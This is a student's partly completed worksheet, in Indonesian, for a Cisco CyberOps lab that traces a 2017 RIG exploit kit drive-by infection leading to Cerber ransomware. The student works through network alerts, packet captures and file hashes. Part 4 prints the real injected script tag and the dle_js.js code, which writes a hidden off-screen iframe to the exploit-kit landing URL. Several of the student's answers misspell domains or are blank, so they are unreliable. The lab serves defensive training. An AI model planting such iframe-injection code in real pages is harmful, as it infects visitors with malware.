27.2.15 Lab - Investigating A Malware Exploit - Yanuar - Yusuf

Lab 27.2.
15 - Investigating a Malware Exploit

Tujuan
Di lab ini, Anda akan:
Bagian 1: Gunakan Kibana untuk Mempelajari Tentang Eksploitasi Malware
Bagian 2: Selidiki Eksploitasi dengan Sguil
Bagian 3: Gunakan Wireshark untuk Menyelidiki Serangan
Bagian 4: Periksa Artefak Eksploitasi
Lab ini didasarkan pada latihan dari situs web malware-traffic-analysis.net yang merupakan sumber daya
yang sangat baik untuk mempelajari cara menganalisis jaringan dan serangan host. Terima kasih kepada
brad@malware-traffic-analysis.net atas izin untuk menggunakan materi dari situsnya.
Catatan: Lab ini membutuhkan komputer host yang dapat mengakses internet.
Latar Belakang / Skenario

Anda telah memutuskan untuk mewawancarai pekerjaan di perusahaan menengah sebagai Analis
Keamanan Siber Tingkat 1. Anda telah diminta untuk menunjukkan kemampuan Anda untuk menunjukkan
detail serangan di mana komputer telah disusupi. Tujuan Anda adalah menjawab serangkaian pertanyaan
menggunakan Sguil, Kibana, dan Wireshark di Security Onion.
Anda telah diberi detail berikut tentang acara tersebut:
 Peristiwa itu terjadi pada Januari 2017.
 Itu ditemukan oleh Snort NIDS.
Sumber Daya yang Diperlukan

 Mesin virtual Security Onion
 Akses internet
Instruksi
Part 1: Gunakan Kibana untuk Mempelajari Tentang Eksploitasi Malware

Di Bagian 1, gunakan Kibana untuk menjawab pertanyaan-pertanyaan berikut. Untuk membantu Anda
memulai, Anda diberi tahu bahwa serangan itu terjadi pada suatu waktu selama Januari 2017. Anda harus
menunjukkan waktu yang tepat.
Step 1: Persempit jangka waktu.

a. Login ke Security Onion dengan username analyst dan password cyberops.
b. Buka Kibana (username analyst dan password cyberops) dan tetapkan rentang waktu Mutlak (Absolute
time range) untuk mempersempit fokus ke data log mulai Januari 2017.
 2020 - 2021Cisco dan / atau afiliasinya. Seluruh hak cipta. Cisco Public Halaman 1 dari 16 www.netacad.com
Lab 27.2.15 - Investigating a Malware Exploit
c. Anda akan melihat grafik muncul dengan satu entri ditampilkan. Untuk melihat lebih detail, Anda perlu
mempersempit jumlah waktu yang ditampilkan. Persempit rentang waktu dalam visualisasi Total Log
Count Over Time dengan mengklik dan menyeret untuk memilih area di sekitar titik data grafik. Anda
mungkin perlu mengulangi proses ini sampai Anda melihat beberapa detail pada grafik.
Catatan: Gunakan tombol <Esc> untuk menutup kotak dialog yang mungkin mengganggu pekerjaan
Anda.
Step 2: Temukan Acara di Kibana

a. Setelah mempersempit rentang waktu di dasbor Kibana utama, buka dasbor NIDS Alert Data dengan
mengklik NIDS.
b. Perbesar event dengan mengklik dan menyeret di visualisasi NIDS - Alerts Over Time lebih jauh
berfokus pada kerangka waktu acara. Karena peristiwa terjadi dalam waktu yang sangat singkat, pilih
hanya garis plot grafik. Perbesar hingga tampilan Anda menyerupai yang di bawah ini.
c. Klik titik pertama di garis waktu untuk memfilter acara pertama itu saja.
d. Sekarang lihat detail peristiwa yang terjadi pada saat itu. Gulir terus ke bawah dashboard sampai Anda
melihat bagian NIDS Alerts pada halaman tersebut. Peringatan diatur oleh waktu. Luaskan acara pertama
dalam daftar dengan mengklik panah penunjuk di sebelah kiri stempel waktu.
e. Lihat detail alert yang diperluas (expand) dan jawab pertanyaan berikut:
Pertanyaan:RI
Kapan peringatan NIDS pertama yang terdeteksi di Kibana?
Jan 27, 2017 – 22:54:43

Apa alamat IP sumber dalam peringatan?
172.16.4.193
Apa alamat IP tujuan dalam peringatan?

194.87.234.129
Apa port tujuan dalam peringatan? Layanan apa ini?

Port 80, adala layanan dari HTTP
Apa klasifikasi alert?
Aktifitas Trojan
Apa nama negara geografis tujuan?
Russia
f. Di browser web di komputer yang bisa terhubung ke internet, buka link yang disediakan di bidang
signature_info pada peringatan. Ini akan membawa Anda ke aturan peringatan Emerging Threats Snort
untuk eksploitasi. Ada serangkaian aturan yang ditampilkan. Ini karena tanda tangan dapat berubah
seiring waktu, atau aturan baru dan lebih akurat dikembangkan. Aturan terbaru ada di bagian atas
halaman. Periksa detail aturan.
Pertanyaan:
Apa keluarga malware untuk acara ini?

Nama atau kelaurga malware untuk hal ini adalah Exploit_Kit_RIG
Seberapa parah eksploitnya?
Apa itu Exploit Kit? (EK) Cari di internet untuk menjawab pertanyaan ini.
Komputer dengan Malware
Eksploitasi kit sering kali menggunakan apa yang disebut serangan drive-by untuk memulai kampanye
serangan. Dalam serangan drive-by, pengguna akan mengunjungi situs web yang dianggap aman.
Namun, pelaku ancaman menemukan cara untuk menyusupi situs web yang sah dengan menemukan
kerentanan di server web yang menghostingnya. Kerentanan memungkinkan pelaku ancaman untuk
memasukkan kode berbahaya mereka sendiri ke dalam HTML halaman web. Kode tersebut sering kali
dimasukkan ke dalam iFrame. iFrames mengizinkan konten dari berbagai situs web untuk ditampilkan di
halaman web yang sama. Pelaku ancaman akan sering membuat iFrame tak terlihat yang
menghubungkan browser ke situs web berbahaya. HTML dari situs web yang dimuat ke dalam browser
sering kali berisi JavaScript yang akan mengirim browser ke situs web berbahaya lainnya atau
mengunduh malware hingga komputer.
Step 3: Lihat Transkrip capME!

a. Klik nilai alert _id, Anda dapat melakukan pivot ke CapME untuk memeriksa transkrip acara.
Di jendela CapME! Anda dapat melihat transkrip dari sesi. Ini menunjukkan transaksi antara komputer
sumber, dengan warna biru, dan tujuan yang diakses oleh sumber. Banyak informasi berharga, termasuk
tautan ke file pcap yang terkait dengan peringatan ini, tersedia di transkrip.
Periksa blok pertama teks biru. Ini adalah permintaan dari sumber ke server web tujuan. Perhatikan
bahwa dua URL terdaftar di blok ini. Yang pertama diberi tag sebagai SRC: REFERER. Ini adalah situs
web yang pertama kali diakses komputer sumber. Namun, server merujuk browser permintaan HTTP
GET ke SRC: HOST. Sesuatu di HTML mengirim sumber ke situs ini. Sepertinya ini bisa jadi serangan
drive-by!
Pertanyaan:
Situs web apa yang ingin disambungkan oleh pengguna?

www.homeimprovement.com
URL manakah yang dirujuk oleh browser kepada pengguna?
ty.benme.com
Jenis konten apa yang diminta oleh host sumber dari tybenme.com? Mengapa ini bisa menjadi masalah?
Lihat juga di blok server DST dari transkrip.
Jenis konten yang diminta adalah gzip, karena ditampilkan sebagai malware, yang
diunduh, dikompres dan dikaburkan
b. Tutup CapME! tab browser.
c. Dari atas NIDS Alert Dashboard, klik entri HTTP yang terletak di bawah judul Zeek Hunting.
d. Di dasbor HTTP, verifikasi bahwa rentang waktu absolut Anda mencakup 2017-01-27 22: 54: 30.000
hingga 2017-01-27 22: 56: 00.000.
e. Gulir ke bawah ke HTTP - Situs bagian dasbor.
Pertanyaan:
Apa sajakah situs web yang terdaftar?

www.bing.com
p27dokhpz2n7nvgr.1jw2lx.top
homeimprovement.com
tyu.benme.com
www.google-analytics.com
api.blockcipher.com
spotsbill.com
fpdownload2.macromedia.com
retrotip.visionurbana.com.ve
Kita harus mengetahui beberapa situs web ini dari transkrip yang kita baca sebelumnya. Tidak semua
situs yang ditampilkan adalah bagian dari kampanye exploit. Riset URL dengan mencarinya di internet.
Jangan terhubung ke mereka. Tempatkan URL dalam tanda kutip saat Anda melakukan pencarian.
Pertanyaan:
Manakah dari situs berikut yang kemungkinan menjadi bagian dari kampanye eksploitasi?
p27dokhpz2n7nvgr.1jw2lx.top, homeimprovement.com, tyu.benme.com, spotsbill.com,

Apa saja Jenis HTTP - MIME yang tercantum di Tag Cloud?

image/jpeg, text/plain, text/html, image/gif, image/png, application/javascript,
application/x-shockwave-flash, text/json
Part 2: Selidiki Eksploitasi dengan Sguil

Di Bagian 2, Anda akan menggunakan Sguil untuk memeriksa peringatan IDS dan mengumpulkan lebih
banyak informasi tentang rangkaian peristiwa yang terkait dengan serangan ini.
Catatan: Alert ID yang digunakan di lab ini hanya sebagai contoh. Alert ID di VM Anda mungkin berbeda.
Step 1: Buka Sguil dan temukan peringatannya.

a. Luncurkan Sguil dari desktop. Login dengan username analyst and password cyberops. Aktifkan semua
sensor dan klik Start.
b. Temukan grup peringatan mulai 27 Januari 2017.
Pertanyaan:
Menurut Sguil, apa stempel waktu untuk peringatan pertama dan terakhir yang terjadi dalam waktu
sekitar satu detik satu sama lain?
22:54:42 hingga 22:55:28
Seluruh eksploitasi terjadi dalam waktu kurang dari satu menit
Step 2: Selidiki peringatan di Sguil.

a. Klik kotak centang Show Packet Data dan Show Rule untuk melihat informasi field header paket dan
aturan tanda tangan IDS yang terkait dengan peringatan.
b. Pilih ID peringatan 5.2 (Pesan acara ET CURRENT Evil Redirector Leading to EK 12 Juli 2016).
Pertanyaan:
Menurut aturan tanda tangan IDS, keluarga malware manakah yang memicu peringatan ini? Anda
mungkin perlu menelusuri tanda tangan untuk menemukan entri ini.
Malware_family PseudoDarkLeech
c. Maksimalkan jendela Sguil dan ukur kolom Pesan Peristiwa sehingga Anda dapat melihat teks dari
keseluruhan pesan. Lihat Pesan Peristiwa untuk setiap ID peringatan yang terkait dengan serangan ini.
Pertanyaan:
Menurut Pesan Peristiwa di Sguil, exploit kit (EK) apa yang terlibat dalam serangan ini?
RIG EK Exploit
Selain memberi label serangan itu sebagai aktivitas trojan, informasi lain apa yang diberikan berkenaan
dengan jenis dan nama malware yang terlibat?
ransomware, Cerber
Menurut perkiraan terbaik Anda dengan melihat peringatan sejauh ini, apa vektor dasar serangan ini?
Bagaimana serangan itu terjadi?
Serangan web terjadi ketika seseorang mengunjungi halaman web yang berbahaya
Step 3: Lihat Transkrip Event

a. Klik kanan Alert ID terkait 5.2 (Event Message ET CURRENT_EVENTS Evil Redirector Leading to EK
Jul 12 2016). Pilih Transcript dari menu seperti yang ditunjukkan pada gambar.
Pertanyaan:
Apa situs perujuk dan host yang terlibat dalam acara SRC pertama? Menurut Anda, apa yang dilakukan
pengguna untuk menghasilkan alert ini?
Pengguna melakukan pencarian di Bing dengan istilah pencarian "Home Improvement,
remodeling your kitchen." Pengguna mengklik tautan www.homeimprovement.com dan
mengunjungi situs itu.
b. Klik kanan alert ID 5.24 (source IP address of 139.59.160.143 and Event Message ET
CURRENT_EVENTS Evil Redirector Leading to EK March 15 2017) dan pilih Transcript untuk
membuka transkrip percakapan.
c. Lihat transkrip dan jawab pertanyaan berikut:

Pertanyaan:
Jenis permintaan apa yang terlibat?

HTTP/1.1 GET request
Apakah ada file yang diminta?
dle_js.js
Apa URL untuk perujuk dan situs web host?
Situs web rujukan adalah www.homeimprovement.com/remodeling-your-kitchen-
cabinets.html dan situs web tuan rumah adalah retrotip.visionbura.com.ve.
Bagaimana konten di encod?

Gzip
d. Tutup jendela transkrip saat ini. Di jendela Sguil, klik kanan alert ID 5.25 (Event Message ET
CURRENT_EVENTS Rig EK URI Struct Mar 13 2017 M2) dan buka transcript. Menurut informasi dalam
transkrip, jawab pertanyaan-pertanyaan berikut:
Pertanyaan:
Berapa banyak permintaan dan tanggapan yang terlibat dalam alert ini?
3 Permintaan dan 3 tanggapan
Apa permintaan pertama?

GET /?ct=Vivaldi&biw=Vivaldi.95ec
Siapa perujuknya (referrer)?

www.homeimprovement.com/remodeling-your-kitchen-cabinets.html
Kepada siapa server host meminta? (Who was the host server request to?)
tyu.benme.com
Apakah tanggapannya di encode?

Gzip
Apa permintaan kedua?
POST /?oq=CEh3h8…. Vivaldi
Kepada siapa server host meminta?
tyu.benme.com
Apakah tanggapannya di encode?

Gzip
Apa permintaan ketiga?

GET /?biw=SeaMonkey.105….
Siapa perujuknya?
http://tyu.benme.com/?biw…
Apa Jenis Konten dari tanggapan ketiga?
application/x-shockwave-flash
Apa 3 karakter pertama dari data dalam respons? Data dimulai setelah entri DST: terakhir.
CWS
CWS adalah tanda tangan file. Tanda tangan file membantu mengidentifikasi tipe file yang mewakili tipe
data yang berbeda. Kunjungi situs web
berikuthttps://en.wikipedia.org/wiki/List_of_file_signatures.Gunakan Ctrl-F untuk membuka kotak cari.
Cari tanda tangan file ini untuk mengetahui jenis file apa yang diunduh dalam data.
Pertanyaan:
Jenis file apa yang di download? Aplikasi apa yang menggunakan jenis file ini?
swf, Adobe Flash
e. Tutup jendela transkrip.
f. Klik kanan lagi ID yang sama dan pilih Network Miner. Klik tab File.
Pertanyaan:
Ada berapa file dan apa jenis filenya?

Ada atau terdapat 3 files yaitu dua html, dan satu swf file
Part 3: Gunakan Wireshark untuk Menyelidiki Serangan

Di Bagian 3, Anda akan beralih ke Wireshark untuk memeriksa detail serangan dengan cermat.
Step 1: Pivot ke Wireshark dan Ubah Pengaturan.

a. Di Sguil, klik kanan alert ID 5.2 (Event Message ET CURRENT_EVENTS Evil Redirector Leading to EK
Jul 12 2016) dan pivot untuk memilih Wireshark dari menu. Pcap yang terkait dengan peringatan ini akan
terbuka di Wireshark.
b. Pengaturan Wireshark default menggunakan waktu relatif per paket yang tidak terlalu membantu untuk
mengisolasi waktu yang tepat suatu peristiwa terjadi. Untuk mengatasinya, pilih View > Time Display
Format > Date and Time of Day dan kemudian ulangi untuk kedua kalinya, View > Time Display
Format > Seconds. Sekarang kolom Wireshark Time Anda memiliki tanggal dan timestamp. Ubah
ukuran kolom untuk membuat tampilan lebih jelas jika perlu.
Step 2: Menyelidiki Lalu Lintas HTTP.

a. Di Wireshark, gunakan filter tampilan http.request untuk memfilter permintaan web saja.
b. Pilih paket pertama. Di area detail paket, perluas data lapisan aplikasi Hypertext Transfer Protocol.
Pertanyaan:
Situs web apa yang mengarahkan pengguna ke situs web www.homeimprovement.com?

Situs web yang mengarahkan pengguna adalah bing
Step 3: Lihat Objek HTTP.

a. Di Wireshark, pilih File > Export Objects > HTTP.
b. Di jendela Export HTTP objects list, pilih paket remodeling-your-kitchen-cabinets.html dan simpan ke
home folder Anda.
c. Tutup Wireshark. Di Sguil, klik kanan alert ID 5.24 (source IP address 139.59.160.143 and Event
Message ET CURRRENT_EVENTS Evil Redirector Leading to EK March 15 2017) dan pilih
Wireshark untuk pivot ke Wireshark. Terapkan filter tampilan http.request dan jawab pertanyaan berikut:
Pertanyaan:
Untuk apa permintaan http?

File JavaScript bernama dle_js.js.
Apa host server nya?

d. Di Wireshark, buka File> Export Objects> HTTP dan simpan file JavaScript ke folder utama Anda.
e. Tutup Wireshark. Di Sguil, klik kanan alert ID 5.25 (Event Message ET CURRENT_EVENTS RIG EK URI
Struct Mar 13 2017 M2) dan pilih Wireshark untuk melakukan pivot ke Wireshark. Terapkan filter
tampilan http.request. Perhatikan bahwa peringatan ini sesuai dengan tiga permintaan GET, POST, dan
GET yang telah kita lihat sebelumnya.
f. Pilih paket pertama, di area detail paket, perluas data lapisan aplikasi Hypertext Transfer Protocol. Klik
kanan Host information dan pilih Apply as Column untuk menambahkan informasi Host ke kolom
daftar paket, seperti yang ditunjukkan pada gambar.
g. Untuk memberi ruang bagi kolom Host, klik kanan tajuk kolom Panjang dan hapus centang. Ini akan
menghapus kolom Panjang dari tampilan.
h. Nama-nama server sekarang terlihat jelas di kolom Host dari daftar paket.
Step 4: Buat Hash untuk File Malware yang Diekspor.

Kita tahu bahwa pengguna bermaksud mengakses www.homeimprovement.com, tetapi situs tersebut
merujuk pengguna ke situs lain. Akhirnya file diunduh ke host dari situs malware. Di bagian lab ini, kita akan
mengakses file yang telah diunduh dan mengirimkan file hash ke VirusTotal untuk memverifikasi bahwa file
berbahaya telah diunduh.
a. Di Wireshark, buka File> Export Objects> HTTP dan simpan dua file teks/html dan file application/x-
shockwave-flash ke direktori home Anda.
b. Sekarang Anda telah menyimpan tiga file ke folder rumah Anda, uji untuk melihat apakah salah satu file
cocok dengan nilai hash yang diketahui untuk malware di virustotal.com. Keluarkan perintah ls -l untuk
melihat file yang disimpan di direktori home Anda. File flash memiliki kata SeaMonkey di dekat awal
nama file yang panjang. Nama file dimulai dengan %3fbiw=SeaMonkey. Gunakan perintah ls -l dengan
grep untuk memfilter nama file dengan pola seamonkey. Opsi -i mengabaikan perbedaan huruf besar /
kecil.
analyst@SecOnion:~$ ls -l | grep -i seamonkey
-rw-r--r-- 1 analyst analyst 16261 Jun 9 05:50

%3fbiw=SeaMonkey.105qj67.406x7d8b3&yus=SeaMonkey.78vg115.406g6d1r6&br_fl=2957&oq=pLLYG
OAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-
qKSErM62V7FjLhTJg&q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-
qoVzcCgWRxfs&ct=SeaMonkey&tuif=1166
c. Buat hash SHA-1 untuk file flash SeaMonkey dengan perintah sha1sum diikuti dengan nama file. Ketik 4
huruf pertama %3fb dari nama file dan kemudian tekan tombol tab untuk mengisi sisa nama file secara
otomatis. Tekan enter dan sha1sum akan menghitung nilai hash panjang tetap 40 digit.
Sorot nilai hash, klik kanan, dan salin. Sha1sum disorot pada contoh di bawah ini. Catatan: Ingatlah untuk
menggunakan penyelesaian tab.
analyst@SecOnion:~$ sha1sum %3fbiw\=SeaMonkey.105qj67.406x7d8b3\&yus\
=SeaMonkey.78vg115.406g6d1r6\&br_fl\=2957\&oq\
=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-qKSErM62V7FjLhTJg\&q\
=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRxfs\&ct\
=SeaMonkey\&tuif\=1166
97a8033303692f9b7618056e49a24470525f7290 %3fbiw=SeaMonkey.105qj67.406x7d8b3&yus=SeaMo
nkey.78vg115.406g6d1r6&br_fl=2957&oq=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E
-qKSErM62V7FjLhTJg&q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRx
fs&ct=SeaMonkey&tuif=1166
d. Anda juga dapat membuat nilai hash dengan menggunakan NetworkMiner. Arahkan ke Sguil dan klik
kanan alert ID 5.25 (Event Message ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2) dan
pilih NetworkMinor untuk pivot ke NetworkMinor. Pilih tab File. Dalam contoh ini, klik kanan file dengan
ekstensi swf dan pilih Calculate MD5 / SHA1 / SHA256 hash. Bandingkan nilai hash SHA1 dengan yang
ada di langkah sebelumnya. Nilai hash SHA1 harus sama.
e. Buka browser web dan buka virustotal.com. Klik tab Search dan masukkan nilai hash untuk mencari
kecocokan di database hashes malware yang dikenal. VirusTotal akan mengembalikan daftar mesin
pendeteksi virus yang memiliki aturan yang cocok dengan hash ini.
f. Selidiki tab Deteksi dan Detail. Tinjau informasi yang diberikan pada nilai hash ini.
Pertanyaan:
Apa yang dikatakan VirusTotal tentang file ini?

VirusTotal adalah salah satu produk layanan online gratis yang berguna untuk
menganalisis berkas dan pranala (URL) dari virus, worm, trojan, SWF adalah bagian
dari kit eksploit RigEK. 32 dari 55 program antivirus memiliki aturan yang
mengidentifikasi hash ini berasal dari file malware.
g. Tutup browser dan Wireshark. Di Sguil, gunakan alert ID 5.37 (Event Message ET CURRENT_EVENTS
RIG EK Landing Sep 12 2016 T2) untuk pivot ke Wireshark dan memeriksa HTTP requests.
Pertanyaan:
Apakah ada kesamaan dengan notifikasi sebelumnya?

Ya, peringatan menunjukkan permintaan GET, POST dan GET ke tyu.benme,com
Apakah filenya mirip? Apakah Anda melihat adanya perbedaan?
Ya, dua file teks/html dan file flash. Dengan Nama filenya berbeda.
h. Buat hash SHA-1 dari file SWF seperti yang Anda lakukan sebelumnya.
Pertanyaan:
Apakah ini malware yang sama yang diunduh di sesi HTTP sebelumnya?
Iya ini merupakan dua malware yang sama
i. Di Sguil, 4 peringatan terakhir dalam rangkaian ini terkait, dan tampaknya juga pasca-infeksi.
Pertanyaan:
Mengapa mereka tampak seperti pasca infeksi?

Karena peringatan tersebut berkaitan dengan komunikasi dengan server
Apa yang menarik tentang alert pertama dalam 4 alert terakhir dalam rangkaian ini?
Mengirim kode UDP ke server pemeriksaan ransomware
Jenis komunikasi apa yang terjadi di peringatan kedua dan ketiga dalam rangkaian dan apa yang
membuatnya mencurigakan?
Permintaan DNS yang dimulai dari host lokal; namun, kecil kemungkinannya bahwa itu
adalah hasil dari aktivitas pengguna biasa. Mereka harus dikirim oleh file malware.
Domain .top tidak terlihat seperti nama domain yang valid.
j. Buka virustotal.com dan lakukan pencarian URL untuk domain .top yang digunakan dalam serangan itu.
Pertanyaan:
Apa hasilnya?
Malicious domain
k. Periksa peringatan terakhir dalam rangkaian di Wireshark. Jika ada objek yang layak disimpan, ekspor
dan simpan ke folder utama Anda.
Pertanyaan:
Apa nama file jika ada?

Ya. EE7EA-D39
Part 4: Periksa Artefak Eksploitasi

Di bagian ini, Anda akan memeriksa beberapa dokumen yang Anda ekspor dari Wireshark.
a. Di Security Onion, buka file remodeling-your-kitchen-cabinets.html menggunakan editor teks pilihan
Anda. Halaman web ini memulai serangan.
Pertanyaan:
Dapatkah Anda menemukan dua tempat di halaman web yang merupakan bagian dari serangan drive-by
yang memulai eksploitasi? Petunjuk: yang pertama ada di area <head> dan yang kedua ada di area
<body> halaman.
Tag skrip di header memuat file JavaScript dle_js.js dari retrotip.visionurbana.com.ve.
Iframe yang memuat konten dari tyu.benme.com didefinisikan di badan HTML .
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Remodeling Your Kitchen Cabinets | Home Improvement</title>
<link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?

feed=rss2" title="Home Improvement latest posts" />
<link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?

feed=comments-rss2" title="Home Improvement latest comments" />
<link rel="pingback" href="//www.homeimprovement.com/xmlrpc.php" />
<link rel="shortcut icon"

href="//www.homeimprovement.com/wp-content/themes/arras/images/favicon.ico" />
<script type="text/javascript"
src="//retrotip.visionurbana.com.ve/engine/classes/js/dle_js.js"></script>

<meta name="description" content="Installing cabinets in a remodeled kitchen require

some basic finish carpentry skills. Before starting any installation, it's a good idea
to mark some level and" />
<meta name="keywords" content="cabinets,kitchen,kitchen cabints,knobs,remodel" />

<some output omitted>
b. Buka file dle_js.js dalam pilihan editor teks dan periksa.

document.write ('<div class = "" style = "position: absolute; width: 383px; height:
368px; left: 17px; top: -858px;"> <div style = "" class = ""> <a > kepala </a> <a
class="head-menu-2"> </a> <iframe src = "http://tyu.benme.com/?
q=zn_QMvXcJwDQDofGMvrESLtEMUbQA0KK2OH_76iyEoH9JHT1vrTUSkrttgWC&biw=Amaya.81lp85.406f4y
5l9&oq=elTX_fUlL7ABPAuy2EyALQZnlY0IU1IQ8fj630PWwUWZ0pDRqx29UToBvdeW&yus=
Amaya.110oz60.406a7e5q8 & br_fl = 4109 & tuif = 5364 & ct = Amaya "width = 290 height
= 257> </ ifr '+' ame> <a style=""> </a> </div> <a class =" "style = ""> temp </a>
</div> ');
Pertanyaan:
Apa fungsi file tersebut?

Ketik jawaban Anda di sini.
Bagaimana kode dalam file javascript berusaha menghindari deteksi?

c. Di editor teks, buka file teks/html yang disimpan ke home folder Anda dengan Vivaldi sebagai bagian dari
nama file.
Periksa file tersebut dan jawab pertanyaan berikut:
Pertanyaan:
Jenis file apa itu?

Apa saja hal menarik tentang iframe? Apakah itu memanggil sesuatu?
Apa fungsi start() yang di lakukan?

Menurut Anda, apa tujuan dari fungsi getBrowser ()?

Refleksi
Exploit Kits adalah eksploitasi yang cukup kompleks yang menggunakan berbagai metode dan sumber daya
untuk melakukan serangan. Menariknya, EK dapat digunakan untuk mengirimkan muatan malware yang
beragam. Ini karena pengembang EK mungkin menawarkan exploit kit sebagai layanan kepada pelaku
ancaman lainnya. Oleh karena itu, RIG EK telah dikaitkan dengan sejumlah muatan malware yang berbeda.
Pertanyaan berikut mungkin mengharuskan Anda menyelidiki data lebih lanjut menggunakan alat yang
diperkenalkan di lab ini.
1. EK menggunakan sejumlah situs web. Lengkapi tabel di bawah.
URL Alamat IP Fungsi
mesin pencari menghubungkan ke

www.bing.com T/A halaman web yang sah
www.homeimprovement.com Ketik jawaban Anda disini Ketik jawaban Anda disini
retrotip.visionurbana.com.ve Ketik jawaban Anda disini Ketik jawaban Anda disini
tyu.benme.com Ketik jawaban Anda disini Ketik jawaban Anda disini
n/a 90.2.10.0 Ketik jawaban Anda disini
p27dokhpz2n7nvgr.1jjw2lx.top Ketik jawaban Anda disini Ketik jawaban Anda disini
2. Berguna untuk "menceritakan kisah" eksploitasi untuk memahami apa yang terjadi dan cara kerjanya.
Mulailah dengan pengguna yang mencari di internet dengan Bing. Cari web untuk informasi lebih lanjut
tentang RIG EK untuk membantu.

27.2.15 Lab - Investigating A Malware Exploit - Yanuar - Yusuf

Diunggah oleh

Informasi Dokumen

Judul Asli

Hak Cipta

Format Tersedia

Bagikan dokumen Ini

Bagikan atau Tanam Dokumen

Opsi Berbagi

Apakah menurut Anda dokumen ini bermanfaat?

Apakah konten ini tidak pantas?

Hak Cipta:

Format Tersedia

27.2.15 Lab - Investigating A Malware Exploit - Yanuar - Yusuf

Diunggah oleh

Hak Cipta:

Format Tersedia

Lab 27.2.

15 - Investigating a Malware Exploit

Latar Belakang / Skenario

Sumber Daya yang Diperlukan

Part 1: Gunakan Kibana untuk Mempelajari Tentang Eksploitasi Malware

Step 1: Persempit jangka waktu.

Step 2: Temukan Acara di Kibana

Kapan peringatan NIDS pertama yang terdeteksi di Kibana?

Jan 27, 2017 – 22:54:43

Apa alamat IP tujuan dalam peringatan?

Apa port tujuan dalam peringatan? Layanan apa ini?

Apa keluarga malware untuk acara ini?

Step 3: Lihat Transkrip capME!

Situs web apa yang ingin disambungkan oleh pengguna?

Apa sajakah situs web yang terdaftar?

p27dokhpz2n7nvgr.1jw2lx.top, homeimprovement.com, tyu.benme.com, spotsbill.com,

Apa saja Jenis HTTP - MIME yang tercantum di Tag Cloud?

Part 2: Selidiki Eksploitasi dengan Sguil

Step 1: Buka Sguil dan temukan peringatannya.

Step 2: Selidiki peringatan di Sguil.

Step 3: Lihat Transkrip Event

c. Lihat transkrip dan jawab pertanyaan berikut:

Jenis permintaan apa yang terlibat?

Bagaimana konten di encod?

Apa permintaan pertama?

Siapa perujuknya (referrer)?

Apakah tanggapannya di encode?

Apakah tanggapannya di encode?

Apa permintaan ketiga?

Ada berapa file dan apa jenis filenya?

Part 3: Gunakan Wireshark untuk Menyelidiki Serangan

Step 1: Pivot ke Wireshark dan Ubah Pengaturan.

Step 2: Menyelidiki Lalu Lintas HTTP.

Situs web apa yang mengarahkan pengguna ke situs web www.homeimprovement.com?

Step 3: Lihat Objek HTTP.

Untuk apa permintaan http?

Apa host server nya?

Step 4: Buat Hash untuk File Malware yang Diekspor.

analyst@SecOnion:~$ ls -l | grep -i seamonkey

-rw-r--r-- 1 analyst analyst 16261 Jun 9 05:50

Apa yang dikatakan VirusTotal tentang file ini?

Apakah ada kesamaan dengan notifikasi sebelumnya?

Mengapa mereka tampak seperti pasca infeksi?

Apa nama file jika ada?

Part 4: Periksa Artefak Eksploitasi

<link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?

<link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?

<link rel="pingback" href="//www.homeimprovement.com/xmlrpc.php" />

<link rel="shortcut icon"

<meta name="description" content="Installing cabinets in a remodeled kitchen require

<meta name="keywords" content="cabinets,kitchen,kitchen cabints,knobs,remodel" />

b. Buka file dle_js.js dalam pilihan editor teks dan periksa.

Apa fungsi file tersebut?

Bagaimana kode dalam file javascript berusaha menghindari deteksi?

Jenis file apa itu?

Apa fungsi start() yang di lakukan?

Menurut Anda, apa tujuan dari fungsi getBrowser ()?

1. EK menggunakan sejumlah situs web. Lengkapi tabel di bawah.

URL Alamat IP Fungsi

mesin pencari menghubungkan ke

Anda mungkin juga menyukai